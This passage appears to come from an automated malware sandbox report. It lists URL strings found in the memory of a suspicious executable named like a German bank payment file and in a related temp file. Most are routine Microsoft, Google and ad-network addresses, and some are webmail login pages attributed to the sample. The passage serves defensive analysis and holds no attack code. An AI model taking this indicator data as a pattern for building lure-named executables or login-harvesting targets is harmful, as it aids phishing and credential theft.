Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?bbc9af5ecc12954d59c63a1771114562
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://eb2.3lift.com/sync?
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8d&Fr
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BY3&Front
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?be80708f3c28e284ad0514b0fdf6c149
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?befe19777c943dc577746ab897037d94
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004460975.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004602535.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012825130.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004886760.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3010910153.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009400912.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005040263.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008966880.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009603810.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004964736.00000000023AD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ib.3lift.com/sync.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ib.adnxs.com/
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://ib.adnxs.com/async_usersync_file
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013438591.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013438591.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/TI
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3003974432.00000000023AD000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004964736.00000000023AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?route=C512_BAY&stsid=S.BC4837E917425070&uaid=d9
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DhB9Gg0Em7s2jvLPGG9crywwB
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C512_BAY&uaid=b6de8762e4ae48b19a7d0d74ba392110
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_n0x1vWZ9nk5hsb6ZgnoOdw2.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_VjBVCmhpr777yb9vmuAJ
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.sv
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b8006
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_uuJCSTysLQ9JSYLCWmrHPQ2.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_3J49gjRV3LSCVj6qj73kPQ2.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_0901d04301714f
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
Source: bhvF4C4.tmp.2.dr | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
